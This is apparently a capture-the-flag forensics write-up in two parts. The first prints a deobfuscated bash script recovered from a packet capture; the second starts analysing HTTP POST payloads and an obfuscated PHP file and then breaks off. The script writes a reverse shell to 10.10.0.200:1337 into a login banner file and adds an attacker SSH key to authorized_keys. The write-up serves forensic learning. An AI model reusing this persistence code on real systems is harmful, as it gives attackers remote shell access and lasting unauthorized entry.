Forensics

Introduction The flag is split into three parts. In this investigation, we were able to recover two parts. We start from a provided .pcap file. 1st part The capture contains two HTTP frames. The second frame is large and contains interesting data. Load the payload in CyberChef. Apply reverse and Base64 decode operations. After decoding, deobfuscate the bash script manually. #!/bin/bash lhJVXukWibAFfkv() { echo 'bash -c "bash -i >& /dev/tcp/10.10.0.200/1337 0>&1"' > /etc/update-motd.d/00-header } x7KG0bvubT6dID2() { echo -e "\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC8Vkq9UTKMakAx2Zq+PnZNc6nYuEK3ZVXxH15bbUeB+elCb3JbVJyBfvAuZ0sonfAqZsyq9Jg6/KGtNsEmtVKXroPXhzFumTgg7Z1NvrUNvnqLIcfxTnP1+/4X284hp0bF2VbITb6oQKgzRdOs8GtOasKaK0k//2E5o0RKIEdrx0aL5HBOGPx0p8GrGe4kRKoAokGXwDVT22LlBylRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IfLMD/FQNy1B4DYhsY62O7o2xR0vxkBEp5UhBAX8gOTG0wjzrUHxmdUimXgiy39YVZaTJQwLBtzJS//YhkewyF/+CP0H7wIKIErlf5WFK5skLYO6uKVpx6akGXY8GADnPU3iPK/MtBC+RqWssdkGqFIA5xG2Fn+Klid9Obm1uXexJfYVjJMOfvuqtb6KcgLmi5uRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IlSxaiOAD2iNJboNuUIxMH/9HNYKd6mlwUpovqFcGBqXizcF21bxNGoOE31Vfox2fq2qW30BDWtHrrYi76iLh02FerHEYHdQAAA08NfUHyCw0fVl/qt6bAgKSb02k691lcDAo5JpEEzNQpub0X8xJItrbw==HTB{r3d15_1n574nc35" >> ~/.ssh/authorized_keys } hL8FbEfp9L1261G() { lhJVXukWibAFfkv x7KG0bvubT6dID2 } hL8FbEfp9L1261G The script reveals the first flag embedded in an ssh-rsa key. ...

Introduction We are provided with two files: A PCAP file A PHP file PCAP Analysis Start by analyzing the PCAP before fully deobfuscating support.php. Filter for HTTP POST requests: Only 4 POST requests are present. Follow the HTTP streams to inspect the payloads. You will observe obfuscated strings such as: 0UlYyJHG87EJqEz66f8af44abea0QKxO/n6DAwXuGEoc5X9/H3HkMXv1Ih75Fx1NdSPRNDPUmHTy351039f4a7b5 These strings will be used as input for the PHP deobfuscation. PHP Analysis The provided PHP script performs multiple layers of obfuscation: ...